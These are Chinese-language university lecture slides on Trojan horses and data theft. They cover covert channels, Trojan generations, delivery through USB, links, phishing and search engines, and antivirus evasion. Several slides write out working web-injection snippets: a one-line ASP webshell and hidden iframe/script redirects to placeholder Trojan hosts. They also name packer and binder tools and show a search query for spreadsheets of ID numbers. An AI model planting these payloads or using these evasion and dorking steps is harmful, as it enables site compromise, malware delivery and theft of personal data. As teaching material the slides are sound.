第六章: 特洛依木馬與資料竊取技術

Download Report

Transcript 第六章: 特洛依木馬與資料竊取技術

教育部資通訊人才培育先導型計畫
寬頻有線教學推動聯盟中心
第六章 特洛依木馬與資料竊取技術
國立雲林科技大學
電腦與通訊工程系
第六章 特洛依木馬與資料竊取技術

6.1 後門與隱密性通道原理

6.2 木馬產生術




大綱
6.2.1 原生型木馬
6.2.2 漏洞型木馬
6.2.3 網頁木馬
6.3 木馬傳送的手法與利用的管道





6.3.1 隨身裝置:USB等儲存媒體
6.3.2 惡意超連結:網站、討論區、部落格等
6.3.3 郵件社交工程
6.3.4 利用搜尋引擎
6.3.5 避過防毒軟體的方式
國立雲林科技大學電腦與通訊工程系
2
第六章 特洛依木馬與資料竊取技術
6.1 後門與隱密性通道原理

木馬程式(Trojan horse):

主要特性有偽裝成一般程式、具有遠端遙控目標
主機之能力、具備隱藏特性,不具備自我複製與
散播的特性。目的是用來獲取機密資料、盜用目
標主機資源、當作攻擊跳板。

本身不具備複製與散播的能力,因此攻擊者將木
馬程式放入郵件、文件檔、遊戲程式等,放到檔
案伺服器上讓其他人下載,當下載這些檔案並且
執行時,便會將木馬程式安裝至被害者的電腦裡
。被安裝木馬程式的主機會開啟某個連接埠等待
攻擊者連入。一般而言木馬程式會分為伺服端
(Server)與客戶端(Client)兩部分。

伺服端程式:藏於某些吸引人的檔案中,引誘被
害者下載並執行,當執行後即被安裝木馬程式,
被安裝木馬程式的被害者電腦會開啟一個連接埠
等待攻擊者進行連線。

客戶端程式:攻擊者利用客戶端的操縱程式對伺
服端進行任何的存取動作、更改設定等。
國立雲林科技大學電腦與通訊工程系
3
第六章 特洛依木馬與資料竊取技術

6.1 後門與隱密性通道原理
在木馬程式與後門程式的設計中有三大重點
1.
植入方式:如何引誘受害者在主機上執行木馬程式
2.
隱藏方式:如何在程式執行時隱藏自已不被使用者或偵測程式所發
現
3.
溝通方式:操控端及受控端要如何溝通
國立雲林科技大學電腦與通訊工程系
4
第六章 特洛依木馬與資料竊取技術

6.1 後門與隱密性通道原理
在木馬程式與後門程式中較常見的幾種隱密通道方式如下:
1. 直接連結
木馬程式的受控者端選擇一特定的通訊埠等待木馬程式操控端連結。連結之後再
以此連線進行指令及結果的傳送。此種方式多半會被防火牆阻擋,且操控者端與
受控端直接連線容易被追蹤。
2. 以電子郵件挾帶資料
利用目前常見的許多免費的電子郵件信箱,受控端將所要傳送的資料置於電子郵
件內容中,寄至操控端指定的電子郵件信箱帳號,與直接連結方式相比,較不易
被追蹤。
3. 以公眾留言版留下資料
木馬程式或後門程式的受控端可被設計成由公眾留言版接收指令,也可於公眾留
言版留下回應訊息。只要主機能夠存取外部的 www 資源,此方法便可運作。
國立雲林科技大學電腦與通訊工程系
5
第六章 特洛依木馬與資料竊取技術

6.1 後門與隱密性通道原理
常見的幾種隱密通道方式(Cont.)
4.以 IRC「接受指令及傳送結果」
木馬程式受控端可以client形式連結至外部IRC伺服器,攻擊者便可即時
控制木馬受控端行動。
5. 以 FTP「取得指令或上傳結果」
木馬程式操控端及受控端以外部 FTP 伺服器作為中介站,進行指令及資
料的交換。
6. 以特殊格式封包進行木馬程式之間的溝通
攻擊者可利用預先定義好的網路封包格式來傳送指令至受害者端。
7. 以即時通訊軟體作為溝通的管道
使用者可以利用即時通訊軟體來傳送訊息、檔案等資料至另一台同樣安
裝有相同的即時通訊的電腦。隨著即時通訊軟體的盛行,木馬與後門程
式也開始利用即時通訊軟體來傳送資料。
國立雲林科技大學電腦與通訊工程系
6
第六章 特洛依木馬與資料竊取技術
6.2 木馬產生術

第一代木馬:
主要對付Unix系統,而Windows當時為數不多,代表作:BO、NetSpy等

第二代木馬:
建構了目前大多數駭客對木馬定義的功能,這時期開始Windows型木馬改為主流,代表作:BO2000、
Sub7、冰河等

第三代木馬:
增加了穿透防火牆的功能(反向連結)等技術來逃避單機型防火牆及IP分享器之功能。代表作:灰鴿子家
族

第四代木馬:
再增加了執行緒隱藏技術DLL Injection並漸漸往Rootkit 技術整合,使系統更加難以發現木馬的存在與入
侵的連接。

第五代木馬:
可隨機替換掉一個狀態為停止的系統服務,不會在註冊表中新增任何的值,安裝後木馬的檔名、與存放
的目錄與路徑都是隨機的,會自動關閉自己隨機選的port等需要時再隨機選一個傳輸。

不管是哪種類別的木馬(網頁木馬、asp木馬等),最終都是需要將exe檔的木馬傳至被害(駭)的電腦中,
只是利用不同的傳播類別增加攔截的困難度。
國立雲林科技大學電腦與通訊工程系
7
第六章 特洛依木馬與資料竊取技術

6.2.1 原生型木馬
原生型木馬:

常見的副檔名:.exe、.com

此種木馬本身就是一個完整的遠端控制型的木馬程序,不需要依賴
漏洞。

感染後的行為:
1.
2.
3.
直接利用該木馬執行檔做竊取
利用DLL Injection技巧與正常程式綑綁的木馬做竊取
利用Rootkit技巧與系統程式綑綁的木馬做竊取
國立雲林科技大學電腦與通訊工程系
8
第六章 特洛依木馬與資料竊取技術

6.2.1 原生型木馬
原生型木馬的感染流程
駭客
P2P網站、論壇、程式收集區
不知情的一般使用者
原生型木馬
國立雲林科技大學電腦與通訊工程系
9
第六章 特洛依木馬與資料竊取技術

6.2.2 漏洞型木馬
漏洞型木馬:

常見的副檔名:.exe、.htm、.html

利用作業系統、瀏覽器、應用程式的漏洞來感染及植入木馬程式。
例如:MS07017

此類型的木馬也可大致上分為二類:

利用木馬產生器產生出類似於原生型木馬的.exe檔,再利用各種社交工
程手法傳給目標主機,與原生型木馬的差別在於,如果目標主機不具有
相對應的漏洞則不會觸發之後的感染行為。

利用木馬產生器產生出僅具有HTML程式碼的.htm檔,再利用網頁瀏覽
的方式來觸發執行.exe檔木馬。
國立雲林科技大學電腦與通訊工程系
10
第六章 特洛依木馬與資料竊取技術

6.2.2 漏洞型木馬
漏洞型木馬的感染流程
首頁或其他網頁被植
入<iFrame>隱藏框架
引導到跳板網站
駭客
知名的官方網站
首頁
不知情的一般使用者
網路釣魚
跳板網站 原生型木馬 漏洞型網馬
國立雲林科技大學電腦與通訊工程系
11
第六章 特洛依木馬與資料竊取技術

6.2.3 網頁型木馬
網頁型木馬:

常見的附檔名:.asp、.aspx、.php

可分為二種型式:

asp或php網頁型木馬:就是利用asp或php語法並添加各種可以控制檔案
的指令所撰寫出來的一個類似檔案總管的網頁,也稱之為「Webshell 」
。 (還可細分為含FSO檔案瀏覽功能與不含FSO的網頁木馬)

一句話網頁木馬:只利用一行語法來傳值的木馬。
例如:<%eval request(“value”)>
國立雲林科技大學電腦與通訊工程系
12
第六章 特洛依木馬與資料竊取技術

6.2.3 網頁型木馬
網頁型木馬的感染流程
[上傳]具FSO功
能的網頁木馬
駭客
知名的官方網站
首頁
不知情的一般使用者
[掛馬]將首頁或其他網
頁植入<iFrame>隱藏框
架引導到跳板網站
漏洞型網頁木馬
跳板網站 原生型木馬
國立雲林科技大學電腦與通訊工程系
13
第六章 特洛依木馬與資料竊取技術
6.2.3 網頁型木馬

框架掛馬:
<iframe src=木馬網址width=0 height=0></iframe>

JScript 文件掛馬:首先將以下語法存檔為xxx.js然後將此文件利用各種方式上傳到目標處
document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");
最後JScript 掛馬的語法為:
<script language=javascript src=xxx.js></script>

JScript 變型加密:
<SCRIPT language=“JScript.Encode”
src=http://www.xxx.com/muma.txt></script>
muma.txt 可改成任何附檔名

body 掛馬:
<body onload="window.location='木馬網址';"></body>

隱藏掛馬:
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="http://www.xxx.com/muma.htm/"></iframe>';
國立雲林科技大學電腦與通訊工程系
14
第六章 特洛依木馬與資料竊取技術

6.2.3 網頁型木馬
CSS 中掛馬:先將製作好的muma.js 先利用各種方式上傳至目標處。
body {
background-image: url('javascript:document.write("<script
src=http://www.XXX.net/muma.js></script>")')}

JAVA 掛馬:
<SCRIPT language=javascript>
window.open ("木馬網址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>

圖片偽裝:
<html>
<iframe src="網馬網址" height=0 width=0></iframe>
<img src="圖片網址">
</html>
國立雲林科技大學電腦與通訊工程系
15
第六章 特洛依木馬與資料竊取技術

6.2.3 網頁型木馬
偽裝呼叫:
<frameset rows="444,0" cols="*">
<frame src="開啟的網頁" framborder="no" scrolling="auto" noresize
marginwidth="0"margingheight="0">
<frame src="網馬網址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

欺騙超連結網址手法:
<a href="http://www.XYZ.com(迷惑他人超連結網址,故意顯示這個網址卻連向木馬網址)"
onMouseOver="www_163_com(); return true;"> 網頁要顯示的內容</a>
<SCRIPT Language="JavaScript">
function www_XYZ_com ()
{
var url="真正連的網頁木馬網址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,r
esizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
國立雲林科技大學電腦與通訊工程系
16
第六章 特洛依木馬與資料竊取技術
6.3 木馬傳送的手法與利用的管道

6.3.1 隨身裝置:USB等儲存媒體

6.3.2 惡意超連結:網站、討論區、部落格等

6.3.3 郵件社交工程

6.3.4 利用搜尋引擎

6.3.5 避過防毒軟體的方式
國立雲林科技大學電腦與通訊工程系
17
第六章 特洛依木馬與資料竊取技術
資料來源
http://www.ithome.com.tw/itadm/article.php?c=47217
6.3.1 隨身裝置:USB等儲存媒體
資料來源
http://www.libertytimes.com.tw/2007/new/nov/11/today-fo5.htm
國立雲林科技大學電腦與通訊工程系
18
第六章 特洛依木馬與資料竊取技術

6.3.1 隨身裝置:USB等儲存媒體
什麼是USB病毒
USB病毒指的是透過USB外接儲存裝置感染擴散的病毒與蠕蟲,通常是由惡意程式與
autorun.inf自動執行檔組成。其中的autorun.inf自動執行檔並不是病毒,而是一個記載著自
動執行程序的檔案,一般光碟片放入電腦後能夠自動執行就是作業系統的「自動執行」功
能偵測到autorun.inf後,依照autorun.inf的敘述執行特定檔案。
因此,當含有USB病毒的USB隨身碟接到電腦後,電腦會依照autorun.inf自動執行檔的設定
,自動執行USB隨身碟中的惡意程式,因而感染了病毒。如果電腦沒辦法掃除這個病毒,
日後其他的USB隨身碟再插上這臺電腦時,這個病毒就會再感染該隨身碟。病毒就藉由隨
身碟在不同電腦中交換使用而交互擴散感染。

如何防範USB病毒
1.
2.
3.
4.
安裝防毒軟體並定期更新病毒碼。
安裝個人防火牆,藉由監控連網行為找出惡意程式
插入外接USB儲存裝置的同時,一直按著Shift鍵不放,直到確定電腦連接上外接裝置
後再放開,以避免自動執行外接裝置中的惡意程式。
關閉電腦的Autorun功能
國立雲林科技大學電腦與通訊工程系
19
第六章 特洛依木馬與資料竊取技術
6.3.1 隨身裝置:USB等儲存媒體
資料來源 http://tw.trendmicro.com
國立雲林科技大學電腦與通訊工程系
20
第六章 特洛依木馬與資料竊取技術

網站、討論區、部落格被惡意掛馬的原因










6.3.2 惡意超連結:網站、討論區、部落格等
Web網站上具有缺失
網站伺服器存在弱點或管理不當
不安全的預設網站路徑與記錄檔檔案配置
沒有更改預設的管理者密碼
設定不當的網頁存取權限
沒有刪除不必要之網站或虛擬目錄
網頁應用程式設計錯誤,具有資料庫隱碼(SQL Injection)弱點
開發的程式可進行跨網站指令碼(XSS)攻擊
開發的程式可進行Session Hijacking攻擊或Cookie欺騙
利用這些缺失來植入網頁型木馬搭配漏洞型木馬
國立雲林科技大學電腦與通訊工程系
21
第六章 特洛依木馬與資料竊取技術

6.3.2 惡意超連結:網站、討論區、部落格等
網站惡意掛馬手法

內嵌




直接在網頁中嵌入惡意程式碼(可導致使用者作業系統被入侵的程式碼)
例如:攻擊Internet Explorer弱點的攻擊程式(MS06-14)
優點:不容易讓使用者發覺
缺點:
1. 可能會被伺服器上的防毒軟體掃除
2. 惡意程式改版不易
3. 須取得完整修改網頁的權限
國立雲林科技大學電腦與通訊工程系
22
第六章 特洛依木馬與資料竊取技術

6.3.2 惡意超連結:網站、討論區、部落格等
網站惡意掛馬手法(Cont.)

外連:




將使用者導引至外部網站
常見的實作手法
1. 修改網頁HTML語法,將使用者導引至外部網站,如IFRAME語法
2. 使用JS檔案將使用者導引至外部網站
優點:
1. 僅需取得插入一行程式碼的權限
2. 駭客可以隨時修改惡意程式
缺點:駭客所使用的網址會被加入黑名單
國立雲林科技大學電腦與通訊工程系
23
第六章 特洛依木馬與資料竊取技術

6.3.2 惡意超連結:網站、討論區、部落格等
外連範例:多媒體檔案

部份多媒體檔案為了增加互動性,支援內嵌script的功能,當使用者
播放該多媒體檔案,將會觸發script的執行。

常見可執行script的多媒體格式
Real Player:RM格式
Flash:SWF格式
Microsoft Media Player:WMV格式

駭客可以修改script內容,在播放影片時將使用者導引至惡意網站。
國立雲林科技大學電腦與通訊工程系
24
第六章 特洛依木馬與資料竊取技術


6.3.3 郵件社交工程
社交工程的定義

社交工程為利用人性弱點或利用人際之信任關係,獲取不當資訊。

使用與人互動的技巧即可獲取帳號、密碼、信用卡密碼、身分證號
碼、姓名、地址或其他可確認身分或機密資料的方法。
社交工程攻擊的定義

利用人性弱點、人際交往或互動特性所發展出來的一種攻擊方法

早期社交工程是使用電話或其他非網路方式來詢問個人資料,而目
前社交工程大都是利用電子郵件或網頁來進行攻擊

透過電子郵件進行攻擊之常見手法

假冒寄件者

使用與業務相關或令人感興趣的郵件內容

含有惡意程式的附件或連結

利用應用程式之弱點(包括零時差攻擊)
國立雲林科技大學電腦與通訊工程系
25
第六章 特洛依木馬與資料竊取技術

6.3.3 郵件社交工程
郵件社交工程攻擊模式
Internet
1.
2.
3.
4.
5.
6.
攻擊者設計惡意程式(例如木馬或是後門程式)
將惡意程式置入電子郵件中
寄發電子郵件給特定的目標
受害者開啟電子郵件
執行攻擊者設計的惡意程式,將被植入後門程式
後門程式逆向連接,向遠端攻擊者通訊
國立雲林科技大學電腦與通訊工程系
26
第六章 特洛依木馬與資料竊取技術
6.3.3 郵件社交工程
資料來源 http://tw.trendmicro.com
國立雲林科技大學電腦與通訊工程系
27
第六章 特洛依木馬與資料竊取技術
6.3.3 郵件社交工程
資料來源 http://tw.trendmicro.com
國立雲林科技大學電腦與通訊工程系
28
第六章 特洛依木馬與資料竊取技術

6.3.3 郵件社交工程
使用電子郵件時應有的習慣

收信






檢查寄件者的真偽。
確認信件內容的真實度 (郵件主旨、附加檔案)。
不輕易開啟郵件中的超連結以及附件。
開啟超連結或檔案前,確認對應軟體(如IE、Office、壓縮軟體)都保持
在最新的修補狀態。
寄件者或郵件主旨與自已無關者 ,建議應立即刪除不要開啟郵件 。
轉信或寄信



未經查證之訊息,不要轉寄。
轉寄郵件前先將他人郵件地址刪除,避免別人的電子郵件地址傳出。
寄送信件給群體收件者時,應將收件者列在密件副件,以免收件人資訊
外洩。
國立雲林科技大學電腦與通訊工程系
29
第六章 特洛依木馬與資料竊取技術
6.3.4 利用搜尋引擎

手法一:購買網路關鍵字廣告服務並於各大入口網站搜尋行銷服務刊登
「關鍵字廣告」,使用者上網搜尋「網路銀行」等條件時,搜尋結果的
最上方即出現犯罪集團之「關鍵字廣告」。

手法二:由於搜尋引擎的搜尋機器人太強大,可能會將已經被植入惡意
連結的網站建立成索引(index),提供給一般人搜尋。如果該搜尋引擎沒
有做好安全控管則易被使用者點選。

一般民眾認為搜尋網站的搜尋結果應該很可靠,進而點選進去。因為這
些廣告或網站是有心人士精心設計,網站管理者亦無法判別廣告之真偽
,更何況一般人,幾乎無法查覺該網站連結是假冒之網站。
國立雲林科技大學電腦與通訊工程系
30
第六章 特洛依木馬與資料竊取技術
資料來源 http://www.zdnet.com.tw
6.3.4 利用搜尋引擎
資料來源 http://www.ithome.com.tw
國立雲林科技大學電腦與通訊工程系
31
第六章 特洛依木馬與資料竊取技術

6.3.4 利用搜尋引擎
駭客詐騙集團利用關鍵字搜尋,架設假網站,搜尋「土地銀行landbank」網站的網址,英
文「land」應是小寫的「l」(圖左下),仔細看可發現變成 阿拉伯數字的「1」,一旦網
友連結,便會遭到詐騙集團以「網路釣魚」方式植入木馬程式,即可任意轉帳或盜取你的
個人資料 。
資料來源 http://www.libertytimes.com.tw
國立雲林科技大學電腦與通訊工程系
32
第六章 特洛依木馬與資料竊取技術

手法三:透過有意義的搜尋字串在搜尋引擎中取得攻擊目標資訊,以
google為例,先了解有哪些搜尋相關的指令。

基本指令







+ : 強制包含某query
- : 排除某query
“ : 組合多個term成為一個query
. : match單一字元
* : match任意數量的任何字元
| : OR運算
進階指令


6.3.4 利用搜尋引擎
filetype, inurl, allinurl, site, intitle, allintitle, intext, allintext, numrange, daterange
例如要查詢的關鍵字「身份證字號」,排除含有「範本」的字樣,並且
只要副檔名為「.xls」的搜尋結果,可參照下圖的語法。
國立雲林科技大學電腦與通訊工程系
33
第六章 特洛依木馬與資料竊取技術

6.3.4 利用搜尋引擎
如果不清楚語法如何使用,也可以直接使用google的進階搜尋功能,如下圖1,在[包含全
部的字詞]欄位裡輸入「身份證字號」,[不包括指定字詞]輸入「範本」,在[檔案類型]選
擇「.xls」,這樣就和輸入「身份證字號 -範本 filetype:xls」的語法相同。搜尋結果如下圖2
。
圖1
圖2
國立雲林科技大學電腦與通訊工程系
34
第六章 特洛依木馬與資料竊取技術

常用的方式便是針對木馬的執行檔進行





6.3.5 避過防毒軟體的方式
加殼:對.exe壓縮(瘦身)或加密(阻擋反組譯)等重組變形
編碼:對.htm的HTML語法做函數的編碼
加密:對.htm的HTML語法做加密
綑綁合併:與正常程式綑綁在一起做為偽裝
當進行這些程序後木馬便會變更其「特徵值」使防毒軟體對
該木馬的檔案辨識不出來進而放行。
國立雲林科技大學電腦與通訊工程系
35
第六章 特洛依木馬與資料竊取技術

6.3.5 避過防毒軟體的方式
加殼

原始目的:
1.
2.
保護程式原始碼防止修改
可以減少程式的體積

木馬再狡猾一旦被防毒軟體定義了特徵碼,會在執行前就被攔截了
。所以要躲過防毒軟體的追殺,很多木馬就被加了殼。

對木馬加殼的行為則類似對程式本身作二次封裝或加密或壓縮的變
化,目的在於讓防毒軟體無法識別出他的原始身分並改變木馬的特
徵檔(偽裝成正常軟體)。

對付這種木馬的方法是使用具有脫殼能力的防毒軟體對系統進行保
護。

常 用 的 加 殼 軟 體 : ASPACK 、 UPX 、 WWPACK32 、 PE-PACK 、
PECompact、PKLITE32、NeoLite、Shrinker
國立雲林科技大學電腦與通訊工程系
36
第六章 特洛依木馬與資料竊取技術

6.3.5 避過防毒軟體的方式
編碼與加密


常見於網頁型的木馬,將HTML內Script語法做編碼或加密,來迷惑
防毒軟體或Web攔截程式。
常用函數:




Escape加密函數與unescape解密函數
Encode加密函數
添零(加空格)加密
自寫函數加密
國立雲林科技大學電腦與通訊工程系
37
第六章 特洛依木馬與資料竊取技術
6.3.5 避過防毒軟體的方式
自訂加解密函數
資料來源
網路攻防技術研討課程Day4_惡意程式.pdf
國立雲林科技大學電腦與通訊工程系
38
第六章 特洛依木馬與資料竊取技術

6.3.5 避過防毒軟體的方式
綑綁合併

木馬的植入程式大多是.exe檔,大部分有警覺心的使用者及管理員均
不會去點選。所以必須要使用綑綁正常程式(常見Flash或Office檔案)
之方法,誘騙(社交工程)目標去點選來達成目的。

為了不引起懷疑,入侵者可以把正常程式(好康程式、小遊戲、序號
程式、免光碟程式)與木馬程式合併成一個檔案來作為偽裝。

高階一點的技巧可以利用應用程式(Office檔案、Flash、影音播放程
式)的漏洞,來與漏洞型木馬合併,藉由點選該檔案後執行一連串的
連鎖觸發,來到植入原生型木馬的目的。

當木馬與正常程式合併時會重新編碼,達到欺騙防毒軟體之效果。

常用工具: Deception Binder、 FreshBind、 MicroJoiner、 ExeBinder
國立雲林科技大學電腦與通訊工程系
39
第六章 特洛依木馬與資料竊取技術

















參考資料
「電子郵件社交工程防護.ppt」。
「CourseFile_49_SCO-B1-202Trojan.doc」。
「網路攻防戰之入侵大揭秘(木馬篇).pdf」。
「防止攻擊跳板主機的安全管理策略.ppt」。
「木馬入侵大揭秘第02集_精華版_講義.pdf」。
「網路安全與管理」,作者:伍麗樵,陳世仁。
「網路攻防技術研討課程Day4_惡意程式.pdf」。
「以網路協定為基礎的隱密通道- 其威脅與防制.pdf」。
「http://www.zdnet.com.tw」。
「http://tw.trendmicro.com」 趨勢科技。
「http://www.ithome.com.tw 」iThome online。
「http://elearning.nat.gov.tw 」電子化政府-網路文官學院。
「http://www.libertytimes.com.tw/index.htm 」自由時報電子報。
「http://armorize-cht.blogspot.com 」阿瑪科技非官方中文Blog。
「http://blog.xuite.net/anson0513/ayo/14674757」新硬碟也有木馬!注意USB病毒。
「http://www.csie.nctu.edu.tw/~skhuang/backdoor.htm」防止攻擊跳板主機的安全管理策略 。
「http://bo2k.sourceforge.net/software/bo2k10.html 」Back Orifice 2000 Server Enhancement Plugins Web Page。
國立雲林科技大學電腦與通訊工程系
40